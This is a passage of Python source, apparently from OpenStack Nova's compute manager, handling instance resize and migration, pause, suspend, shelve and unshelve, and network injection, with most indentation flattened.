            # host here.
migration_p['dest_compute'] = migration.source_compute
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self.network_api.get_instance_nw_info(context,
instance)
# revert_resize deleted any volume attachments for the instance
# and created new ones to be used on this host, but we
# have to update those attachments with the host connector so the
# BDM.connection_info will get set in the call to
# _get_instance_block_device_info below with refresh_conn_info=True
# and then the volumes can be re-connected via the driver on this
# host.
self._update_volume_attachments(context, instance, bdms)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True, bdms=bdms)
power_on = old_vm_state != vm_states.STOPPED
self.driver.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
instance.drop_migration_context()
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_REVERTING)
# Complete any volume attachments so the volumes are in-use.
self._complete_volume_attachments(context, bdms)
# if the original vm state was STOPPED, set it back to STOPPED
LOG.info("Updating instance to original state: '%s'",
old_vm_state, instance=instance)
if power_on:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save()
else:
instance.task_state = task_states.POWERING_OFF
instance.save()
self.stop_instance(context, instance=instance,
clean_shutdown=True)
self._notify_about_instance_usage(
context, instance, "resize.revert.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_REVERT,
phase=fields.NotificationPhase.END, bdms=bdms)
def _revert_allocation(self, context, instance, migration):
"""Revert an allocation that is held by migration to our instance."""
# Fetch the original allocation that the instance had on the source
# node, which are now held by the migration
orig_alloc = self.reportclient.get_allocations_for_consumer(
context, migration.uuid)
if not orig_alloc:
# NOTE(danms): This migration did not do per-migration allocation
# accounting, so nothing to do here.
LOG.info('Old-style migration %(mig)s is being reverted; '
'no migration claims found on original node '
'to swap.',
{'mig': migration.uuid},
instance=instance)
return False
if len(orig_alloc) > 1:
# NOTE(danms): This may change later if we have other allocations
# against other providers that need to be held by the migration
# as well. Perhaps something like shared storage resources that
# will actually be duplicated during a resize type operation.
LOG.error('New-style migration %(mig)s has allocations against '
'more than one provider %(rps)s. This should not be '
'possible, but reverting it anyway.',
{'mig': migration.uuid,
'rps': ','.join(orig_alloc.keys())},
instance=instance)
# We only have a claim against one provider, it is the source node
cn_uuid = list(orig_alloc.keys())[0]
# Get just the resources part of the one allocation we need below
orig_alloc = orig_alloc[cn_uuid].get('resources', {})
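        # At this point orig_alloc is just the resources dict for the source
        # node provider, e.g. {'VCPU': 2, 'MEMORY_MB': 4096, 'DISK_GB': 40}
        # (illustrative values only).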
        # FIXME(danms): This method is flawed in that it assumes allocations
        # against only one provider. So, this may overwrite allocations against
# a shared provider, if we had one.
LOG.info('Swapping old allocation on %(node)s held by migration '
'%(mig)s for instance',
{'node': cn_uuid, 'mig': migration.uuid},
instance=instance)
# TODO(cdent): Should we be doing anything with return values here?
self.reportclient.set_and_clear_allocations(
context, cn_uuid, instance.uuid, orig_alloc, instance.project_id,
instance.user_id, consumer_to_clear=migration.uuid)
return True
def _prep_resize(self, context, image, instance, instance_type,
filter_properties, node, migration, clean_shutdown=True):
if not filter_properties:
filter_properties = {}
if not instance.host:
self._set_instance_obj_error_state(context, instance)
msg = _('Instance has no source host')
raise exception.MigrationError(reason=msg)
same_host = instance.host == self.host
# if the flavor IDs match, it's migrate; otherwise resize
if same_host and instance_type.id == instance['instance_type_id']:
# check driver whether support migrate to same host
if not self.driver.capabilities['supports_migrate_to_same_host']:
raise exception.UnableToMigrateToSelf(
instance_id=instance.uuid, host=self.host)
# NOTE(danms): Stash the new instance_type to avoid having to
# look it up in the database later
instance.new_flavor = instance_type
# NOTE(mriedem): Stash the old vm_state so we can set the
# resized/reverted instance back to the same state later.
vm_state = instance.vm_state
LOG.debug('Stashing vm_state: %s', vm_state, instance=instance)
instance.system_metadata['old_vm_state'] = vm_state
instance.save()
limits = filter_properties.get('limits', {})
rt = self._get_resource_tracker()
with rt.resize_claim(context, instance, instance_type, node,
migration, image_meta=image,
limits=limits) as claim:
LOG.info('Migrating', instance=instance)
# RPC cast to the source host to start the actual resize/migration.
self.compute_rpcapi.resize_instance(
context, instance, claim.migration, image,
instance_type, clean_shutdown)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def prep_resize(self, context, image, instance, instance_type,
request_spec, filter_properties, node,
clean_shutdown, migration, host_list):
"""Initiates the process of moving a running instance to another host.
Possibly changes the VCPU, RAM and disk size in the process.
This is initiated from conductor and runs on the destination host.
The main purpose of this method is performing some checks on the
destination host and making a claim for resources. If the claim fails
then a reschedule to another host may be attempted which involves
calling back to conductor to start the process over again.
"""
if node is None:
node = self._get_nodename(instance, refresh=True)
with self._error_out_instance_on_exception(context, instance), \
errors_out_migration_ctxt(migration):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(
context, instance, "resize.prep.start")
compute_utils.notify_about_resize_prep_instance(
context, instance, self.host,
fields.NotificationPhase.START, instance_type)
try:
self._prep_resize(context, image, instance,
instance_type, filter_properties,
node, migration, clean_shutdown)
except Exception:
# Since we hit a failure, we're either rescheduling or dead
# and either way we need to cleanup any allocations created
# by the scheduler for the destination node.
if migration and not self._revert_allocation(
context, instance, migration):
# We did not do a migration-based
# allocation. Note that for a resize to the
# same host, the scheduler will merge the
# flavors, so here we'd be subtracting the new
# flavor from the allocated resources on this
# node.
# FIXME(danms): Remove this in Rocky
rt = self._get_resource_tracker()
rt.delete_allocation_for_failed_resize(
context, instance, node, instance_type)
# try to re-schedule the resize elsewhere:
exc_info = sys.exc_info()
self._reschedule_resize_or_reraise(context, image, instance,
exc_info, instance_type, request_spec,
filter_properties, host_list)
finally:
extra_usage_info = dict(
new_instance_type=instance_type.name,
new_instance_type_id=instance_type.id)
self._notify_about_instance_usage(
context, instance, "resize.prep.end",
extra_usage_info=extra_usage_info)
compute_utils.notify_about_resize_prep_instance(
context, instance, self.host,
fields.NotificationPhase.END, instance_type)
def _reschedule_resize_or_reraise(self, context, image, instance, exc_info,
instance_type, request_spec, filter_properties, host_list):
"""Try to re-schedule the resize or re-raise the original error to
error out the instance.
"""
if not request_spec:
request_spec = {}
if not filter_properties:
filter_properties = {}
rescheduled = False
instance_uuid = instance.uuid
try:
reschedule_method = self.compute_task_api.resize_instance
scheduler_hint = dict(filter_properties=filter_properties)
method_args = (instance, None, scheduler_hint, instance_type)
task_state = task_states.RESIZE_PREP
rescheduled = self._reschedule(context, request_spec,
filter_properties, instance, reschedule_method,
method_args, task_state, exc_info, host_list=host_list)
except Exception as error:
rescheduled = False
LOG.exception("Error trying to reschedule",
instance_uuid=instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, error,
exc_info=sys.exc_info())
self._notify_about_instance_usage(context, instance,
'resize.error', fault=error)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.ERROR,
exception=error)
if rescheduled:
self._log_original_error(exc_info, instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'resize.error', fault=exc_info[1])
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.ERROR,
exception=exc_info[1])
else:
# not re-scheduling
six.reraise(*exc_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def resize_instance(self, context, instance, image,
migration, instance_type, clean_shutdown):
"""Starts the migration of a running instance to another host.
This is initiated from the destination host's ``prep_resize`` routine
and runs on the source host.
"""
try:
self._resize_instance(context, instance, image, migration,
instance_type, clean_shutdown)
except Exception:
with excutils.save_and_reraise_exception():
self._revert_allocation(context, instance, migration)
def _resize_instance(self, context, instance, image,
migration, instance_type, clean_shutdown):
with self._error_out_instance_on_exception(context, instance), \
errors_out_migration_ctxt(migration):
network_info = self.network_api.get_instance_nw_info(context,
instance)
migration.status = 'migrating'
with migration.obj_as_admin():
migration.save()
instance.task_state = task_states.RESIZE_MIGRATING
instance.save(expected_task_state=task_states.RESIZE_PREP)
self._notify_about_instance_usage(
context, instance, "resize.start", network_info=network_info)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.START, bdms=bdms)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
disk_info = self.driver.migrate_disk_and_power_off(
context, instance, migration.dest_host,
instance_type, network_info,
block_device_info,
timeout, retry_interval)
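            # disk_info returned by the driver describes the migrated disk(s)
            # and is handed to finish_resize on the destination compute below.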
self._terminate_volume_connections(context, instance, bdms)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
migration.status = 'post-migrating'
with migration.obj_as_admin():
migration.save()
instance.host = migration.dest_compute
instance.node = migration.dest_node
instance.task_state = task_states.RESIZE_MIGRATED
instance.save(expected_task_state=task_states.RESIZE_MIGRATING)
# RPC cast to the destination host to finish the resize/migration.
self.compute_rpcapi.finish_resize(context, instance,
migration, image, disk_info, migration.dest_compute)
self._notify_about_instance_usage(context, instance, "resize.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE,
phase=fields.NotificationPhase.END, bdms=bdms)
self.instance_events.clear_events_for_instance(instance)
def _terminate_volume_connections(self, context, instance, bdms):
connector = None
for bdm in bdms:
if bdm.is_volume:
if bdm.attachment_id:
                    # NOTE(jdg): The idea behind the new attach APIs was to
                    # have a new code fork/path that we followed. We're not
                    # going to do that here, so we have to do some extra work
                    # to make this *behave* just like the old code. Cinder
                    # doesn't allow disconnecting/reconnecting an attachment
                    # in the new attach code (you just delete the attachment
                    # and get a new one), so we do a delete and then a create
                    # without a connector (a reserve); in other words, beware.
attachment_id = self.volume_api.attachment_create(
context, bdm.volume_id, instance.uuid)['id']
self.volume_api.attachment_delete(context,
bdm.attachment_id)
bdm.attachment_id = attachment_id
bdm.save()
else:
if connector is None:
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
@staticmethod
def _set_instance_info(instance, instance_type):
instance.instance_type_id = instance_type.id
instance.memory_mb = instance_type.memory_mb
instance.vcpus = instance_type.vcpus
instance.root_gb = instance_type.root_gb
instance.ephemeral_gb = instance_type.ephemeral_gb
instance.flavor = instance_type
def _update_volume_attachments(self, context, instance, bdms):
"""Updates volume attachments using the virt driver host connector.
:param context: nova.context.RequestContext - user request context
:param instance: nova.objects.Instance
:param bdms: nova.objects.BlockDeviceMappingList - the list of block
device mappings for the given instance
"""
if bdms:
connector = None
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id:
if connector is None:
connector = self.driver.get_volume_connector(instance)
self.volume_api.attachment_update(
context, bdm.attachment_id, connector, bdm.device_name)
def _complete_volume_attachments(self, context, bdms):
"""Completes volume attachments for the instance
:param context: nova.context.RequestContext - user request context
:param bdms: nova.objects.BlockDeviceMappingList - the list of block
device mappings for the given instance
"""
if bdms:
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id:
self.volume_api.attachment_complete(
context, bdm.attachment_id)
def _finish_resize(self, context, instance, migration, disk_info,
image_meta, bdms):
resize_instance = False
old_instance_type_id = migration['old_instance_type_id']
new_instance_type_id = migration['new_instance_type_id']
old_instance_type = instance.get_flavor()
# NOTE(mriedem): Get the old_vm_state so we know if we should
# power on the instance. If old_vm_state is not set we need to default
# to ACTIVE for backwards compatibility
old_vm_state = instance.system_metadata.get('old_vm_state',
vm_states.ACTIVE)
instance.old_flavor = old_instance_type
if old_instance_type_id != new_instance_type_id:
instance_type = instance.get_flavor('new')
self._set_instance_info(instance, instance_type)
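            # Only flag a disk resize for the driver if a disk-related flavor
            # attribute actually changed; finish_migration on the driver uses
            # this to decide whether the disks need to be resized.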
for key in ('root_gb', 'swap', 'ephemeral_gb'):
if old_instance_type[key] != instance_type[key]:
resize_instance = True
break
instance.apply_migration_context()
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
migration['dest_compute'])
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self.network_api.get_instance_nw_info(context, instance)
instance.task_state = task_states.RESIZE_FINISH
instance.save(expected_task_state=task_states.RESIZE_MIGRATED)
self._notify_about_instance_usage(
context, instance, "finish_resize.start",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_FINISH,
phase=fields.NotificationPhase.START, bdms=bdms)
# We need to update any volume attachments using the destination
# host connector so that we can update the BDM.connection_info
# before calling driver.finish_migration otherwise the driver
# won't know how to connect the volumes to this host.
# Note that _get_instance_block_device_info with
# refresh_conn_info=True will update the BDM.connection_info value
# in the database so we must do this before calling that method.
self._update_volume_attachments(context, instance, bdms)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True, bdms=bdms)
# NOTE(mriedem): If the original vm_state was STOPPED, we don't
# automatically power on the instance after it's migrated
power_on = old_vm_state != vm_states.STOPPED
try:
self.driver.finish_migration(context, migration, instance,
disk_info,
network_info,
image_meta, resize_instance,
block_device_info, power_on)
except Exception:
with excutils.save_and_reraise_exception():
if old_instance_type_id != new_instance_type_id:
self._set_instance_info(instance,
old_instance_type)
# Now complete any volume attachments that were previously updated.
self._complete_volume_attachments(context, bdms)
migration.status = 'finished'
with migration.obj_as_admin():
migration.save()
instance.vm_state = vm_states.RESIZED
instance.task_state = None
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_FINISH)
return network_info
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def finish_resize(self, context, disk_info, image, instance,
migration):
"""Completes the migration process.
Sets up the newly transferred disk and turns on the instance at its
new host machine.
"""
try:
self._finish_resize_helper(context, disk_info, image, instance,
migration)
except Exception:
with excutils.save_and_reraise_exception():
self._revert_allocation(context, instance, migration)
def _finish_resize_helper(self, context, disk_info, image, instance,
migration):
"""Completes the migration process.
The caller must revert the instance's allocations if the migration
process failed.
"""
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
with self._error_out_instance_on_exception(context, instance), \
errors_out_migration_ctxt(migration):
image_meta = objects.ImageMeta.from_dict(image)
network_info = self._finish_resize(context, instance, migration,
disk_info, image_meta, bdms)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "finish_resize.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_FINISH,
phase=fields.NotificationPhase.END, bdms=bdms)
@wrap_exception()
@wrap_instance_fault
def add_fixed_ip_to_instance(self, context, network_id, instance):
"""Calls network_api to add new fixed_ip to instance
then injects the new network info and resets instance networking.
"""
self._notify_about_instance_usage(
context, instance, "create_ip.start")
network_info = self.network_api.add_fixed_ip_to_instance(context,
instance,
network_id)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "create_ip.end", network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def remove_fixed_ip_from_instance(self, context, address, instance):
"""Calls network_api to remove existing fixed_ip from instance
by injecting the altered network info and resetting
instance networking.
"""
self._notify_about_instance_usage(
context, instance, "delete_ip.start")
network_info = self.network_api.remove_fixed_ip_from_instance(context,
instance,
address)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "delete_ip.end", network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def pause_instance(self, context, instance):
"""Pause an instance on this host."""
context = context.elevated()
LOG.info('Pausing', instance=instance)
self._notify_about_instance_usage(context, instance, 'pause.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.PAUSE,
phase=fields.NotificationPhase.START)
self.driver.pause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.PAUSED
instance.task_state = None
instance.save(expected_task_state=task_states.PAUSING)
self._notify_about_instance_usage(context, instance, 'pause.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.PAUSE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def unpause_instance(self, context, instance):
"""Unpause a paused instance on this host."""
context = context.elevated()
LOG.info('Unpausing', instance=instance)
self._notify_about_instance_usage(context, instance, 'unpause.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNPAUSE,
phase=fields.NotificationPhase.START)
self.driver.unpause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.UNPAUSING)
self._notify_about_instance_usage(context, instance, 'unpause.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNPAUSE,
phase=fields.NotificationPhase.END)
@wrap_exception()
def host_power_action(self, context, action):
"""Reboots, shuts down or powers up the host."""
return self.driver.host_power_action(action)
@wrap_exception()
def host_maintenance_mode(self, context, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
return self.driver.host_maintenance_mode(host, mode)
@wrap_exception()
def set_host_enabled(self, context, enabled):
"""Sets the specified host's ability to accept new instances."""
return self.driver.set_host_enabled(enabled)
@wrap_exception()
def get_host_uptime(self, context):
"""Returns the result of calling "uptime" on the target host."""
return self.driver.get_host_uptime()
@wrap_exception()
@wrap_instance_fault
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info("Retrieving diagnostics", instance=instance)
return self.driver.get_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power state',
instance_uuid=instance.uuid,
state=power_state.STATE_MAP[instance.power_state],
method='get_diagnostics')
@wrap_exception()
@wrap_instance_fault
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info("Retrieving diagnostics", instance=instance)
return self.driver.get_instance_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power state',
instance_uuid=instance.uuid,
state=power_state.STATE_MAP[instance.power_state],
                method='get_instance_diagnostics')
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def suspend_instance(self, context, instance):
"""Suspend the given instance."""
context = context.elevated()
# Store the old state
instance.system_metadata['old_vm_state'] = instance.vm_state
self._notify_about_instance_usage(context, instance, 'suspend.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SUSPEND,
phase=fields.NotificationPhase.START)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.suspend(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SUSPENDED
instance.task_state = None
instance.save(expected_task_state=task_states.SUSPENDING)
self._notify_about_instance_usage(context, instance, 'suspend.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SUSPEND,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def resume_instance(self, context, instance):
"""Resume the given suspended instance."""
context = context.elevated()
LOG.info('Resuming', instance=instance)
self._notify_about_instance_usage(context, instance, 'resume.start')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESUME,
phase=fields.NotificationPhase.START, bdms=bdms)
network_info = self.network_api.get_instance_nw_info(context, instance)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.resume(context, instance, network_info,
block_device_info)
instance.power_state = self._get_power_state(context, instance)
# We default to the ACTIVE state for backwards compatibility
instance.vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
instance.task_state = None
instance.save(expected_task_state=task_states.RESUMING)
self._notify_about_instance_usage(context, instance, 'resume.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESUME,
phase=fields.NotificationPhase.END, bdms=bdms)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def shelve_instance(self, context, instance, image_id,
clean_shutdown):
"""Shelve an instance.
This should be used when you want to take a snapshot of the instance.
It also adds system_metadata that can be used by a periodic task to
offload the shelved instance after a period of time.
:param context: request context
:param instance: an Instance object
:param image_id: an image id to snapshot to.
:param clean_shutdown: give the GuestOS a chance to stop
"""
@utils.synchronized(instance.uuid)
def do_shelve_instance():
self._shelve_instance(context, instance, image_id, clean_shutdown)
do_shelve_instance()
def _shelve_instance(self, context, instance, image_id,
clean_shutdown):
LOG.info('Shelving', instance=instance)
offload = CONF.shelved_offload_time == 0
if offload:
# Get the BDMs early so we can pass them into versioned
# notifications since _shelve_offload_instance needs the
# BDMs anyway.
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
else:
bdms = None
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(context, instance, 'shelve.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE,
phase=fields.NotificationPhase.START, bdms=bdms)
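        # The driver reports snapshot progress using the generic image task
        # states; remap them to the shelving-specific task states so the
        # instance shows SHELVING_* while the snapshot is taken and uploaded.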
def update_task_state(task_state, expected_state=task_states.SHELVING):
shelving_state_map = {
task_states.IMAGE_PENDING_UPLOAD:
task_states.SHELVING_IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING:
task_states.SHELVING_IMAGE_UPLOADING,
task_states.SHELVING: task_states.SHELVING}
task_state = shelving_state_map[task_state]
expected_state = shelving_state_map[expected_state]
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
# Do not attempt a clean shutdown of a paused guest since some
# hypervisors will fail the clean shutdown if the guest is not
# running.
if instance.power_state == power_state.PAUSED:
clean_shutdown = False
self._power_off_instance(context, instance, clean_shutdown)
self.driver.snapshot(context, instance, image_id, update_task_state)
instance.system_metadata['shelved_at'] = timeutils.utcnow().isoformat()
instance.system_metadata['shelved_image_id'] = image_id
instance.system_metadata['shelved_host'] = self.host
instance.vm_state = vm_states.SHELVED
instance.task_state = None
if CONF.shelved_offload_time == 0:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=[
task_states.SHELVING,
task_states.SHELVING_IMAGE_UPLOADING])
self._notify_about_instance_usage(context, instance, 'shelve.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE,
phase=fields.NotificationPhase.END, bdms=bdms)
if offload:
self._shelve_offload_instance(context, instance,
clean_shutdown=False, bdms=bdms)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def shelve_offload_instance(self, context, instance, clean_shutdown):
"""Remove a shelved instance from the hypervisor.
This frees up those resources for use by other instances, but may lead
to slower unshelve times for this instance. This method is used by
volume backed instances since restoring them doesn't involve the
potentially large download of an image.
:param context: request context
:param instance: nova.objects.instance.Instance
:param clean_shutdown: give the GuestOS a chance to stop
"""
@utils.synchronized(instance.uuid)
def do_shelve_offload_instance():
self._shelve_offload_instance(context, instance, clean_shutdown)
do_shelve_offload_instance()
def _shelve_offload_instance(self, context, instance, clean_shutdown,
bdms=None):
LOG.info('Shelve offloading', instance=instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE_OFFLOAD,
phase=fields.NotificationPhase.START, bdms=bdms)
self._power_off_instance(context, instance, clean_shutdown)
current_power_state = self._get_power_state(context, instance)
self.network_api.cleanup_instance_network_on_host(context, instance,
instance.host)
network_info = self.network_api.get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance,
bdms=bdms)
self.driver.destroy(context, instance, network_info,
block_device_info)
# the instance is going to be removed from the host so we want to
# terminate all the connections with the volume server and the host
self._terminate_volume_connections(context, instance, bdms)
instance.power_state = current_power_state
# NOTE(mriedem): The vm_state has to be set before updating the
# resource tracker, see vm_states.ALLOW_RESOURCE_REMOVAL. The host/node
# values cannot be nulled out until after updating the resource tracker
# though.
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.task_state = None
instance.save(expected_task_state=[task_states.SHELVING,
task_states.SHELVING_OFFLOADING])
# NOTE(ndipanov): Free resources from the resource tracker
self._update_resource_tracker(context, instance)
rt = self._get_resource_tracker()
rt.delete_allocation_for_shelve_offloaded_instance(context, instance)
# NOTE(sfinucan): RPC calls should no longer be attempted against this
# instance, so ensure any calls result in errors
self._nil_out_instance_obj_host_and_node(instance)
instance.save(expected_task_state=None)
self._delete_scheduler_instance_info(context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHELVE_OFFLOAD,
phase=fields.NotificationPhase.END, bdms=bdms)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def unshelve_instance(self, context, instance, image,
filter_properties, node):
"""Unshelve the instance.
:param context: request context
:param instance: a nova.objects.instance.Instance object
:param image: an image to build from. If None we assume a
volume backed instance.
:param filter_properties: dict containing limits, retry info etc.
:param node: target compute node
"""
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_unshelve_instance():
self._unshelve_instance(context, instance, image,
filter_properties, node)
do_unshelve_instance()
def _unshelve_instance_key_scrub(self, instance):
"""Remove data from the instance that may cause side effects."""
cleaned_keys = dict(
key_data=instance.key_data,
auto_disk_config=instance.auto_disk_config)
instance.key_data = None
instance.auto_disk_config = False
return cleaned_keys
def _unshelve_instance_key_restore(self, instance, keys):
"""Restore previously scrubbed keys before saving the instance."""
instance.update(keys)
def _unshelve_instance(self, context, instance, image, filter_properties,
node):
LOG.info('Unshelving', instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._notify_about_instance_usage(context, instance, 'unshelve.start')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNSHELVE,
phase=fields.NotificationPhase.START, bdms=bdms)
instance.task_state = task_states.SPAWNING
instance.save()
block_device_info = self._prep_block_device(context, instance, bdms)
scrubbed_keys = self._unshelve_instance_key_scrub(instance)
if node is None:
node = self._get_nodename(instance)
rt = self._get_resource_tracker()
limits = filter_properties.get('limits', {})
allocations = self.reportclient.get_allocations_for_consumer(
context, instance.uuid)
shelved_image_ref = instance.image_ref
if image:
instance.image_ref = image['id']
image_meta = objects.ImageMeta.from_dict(image)
else:
image_meta = objects.ImageMeta.from_dict(
utils.get_image_from_system_metadata(
instance.system_metadata))
self.network_api.setup_instance_network_on_host(context, instance,
self.host)
network_info = self.network_api.get_instance_nw_info(context, instance)
try:
with rt.instance_claim(context, instance, node, limits):
self.driver.spawn(context, instance, image_meta,
injected_files=[],
admin_password=None,
allocations=allocations,
network_info=network_info,
block_device_info=block_device_info)
except Exception:
with excutils.save_and_reraise_exception(logger=LOG):
LOG.exception('Instance failed to spawn',
instance=instance)
# Cleanup allocations created by the scheduler on this host
# since we failed to spawn the instance. We do this both if
# the instance claim failed with ComputeResourcesUnavailable
# or if we did claim but the spawn failed, because aborting the
# instance claim will not remove the allocations.
rt.reportclient.delete_allocation_for_instance(context,
instance.uuid)
# FIXME: Umm, shouldn't we be rolling back port bindings too?
self._terminate_volume_connections(context, instance, bdms)
# The reverts_task_state decorator on unshelve_instance will
# eventually save these updates.
self._nil_out_instance_obj_host_and_node(instance)
if image:
instance.image_ref = shelved_image_ref
self._delete_snapshot_of_shelved_instance(context, instance,
image['id'])
self._unshelve_instance_key_restore(instance, scrubbed_keys)
self._update_instance_after_spawn(context, instance)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.SPAWNING)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'unshelve.end')
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNSHELVE,
phase=fields.NotificationPhase.END, bdms=bdms)
@messaging.expected_exceptions(NotImplementedError)
@wrap_instance_fault
def reset_network(self, context, instance):
"""Reset networking on the given instance."""
LOG.debug('Reset network', instance=instance)
self.driver.reset_network(instance)
def _inject_network_info(self, context, instance, network_info):
"""Inject network info for the given instance."""
LOG.debug('Inject network info', instance=instance)
LOG.debug('network_info to inject: |%s|', network_info,
instance=instance)
self.driver.inject_network_info(instance,
network_info)
@wrap_instance_fault
def inject_network_info(self, context, instance):
"""Inject network info, but don't return the info."""
network_info = self.network_api.get_instance_nw_info(context, instance)
self._inject_network_info(context, instance, network_info)
@messaging.expected_exceptions(NotImplementedError,
exception.ConsoleNotAvailable,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
